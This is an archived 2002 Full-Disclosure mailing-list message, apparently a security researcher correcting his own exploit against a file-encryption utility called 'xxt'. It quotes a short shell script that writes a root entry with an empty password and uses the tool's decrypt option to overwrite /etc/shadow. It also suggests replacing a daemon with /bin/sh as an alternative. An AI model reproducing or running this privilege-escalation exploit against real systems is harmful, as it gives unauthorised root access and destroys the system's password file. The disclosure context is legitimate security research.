| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <Pine.LNX.4.44.0208280209120.12566-100000@clarity.local> From: zen-parse at gmx.net (zen-parse) Subject: Re: oops On Wed, 28 Aug 2002, zen-parse wrote: > #!/bin/sh > echo root::11679:0:99999:7::: >inp > ./xxt -i inp -k woot -e > ./xxt -i inp -k woot -d -x -o /etc/shadow oops ./xxt -i inp.xxt -k woot -d -x -o /etc/shadow probably be better to overwrite some daemon with /bin/sh and connect,or something like that. damn... see what happens in the rush for immediate full-disclosure? better to do it responsibly, make sure you have the facts right, and probably be better not to post the exploit to a public forum straight away... aliver: eventually i got it though. your help page is wrong about either the -u option, or the example code too.. -- zen-parse -- ------------------------------------------------------------------------- 1) If this message was posted to a public forum by zen-parse@....net, it may be redistributed without modification. 2) In any other case the contents of this message is confidential and not to be distributed in any form without express permission from the author. This document may contain Unclassified Controlled Nuclear Information.
Powered by blists - more mailing lists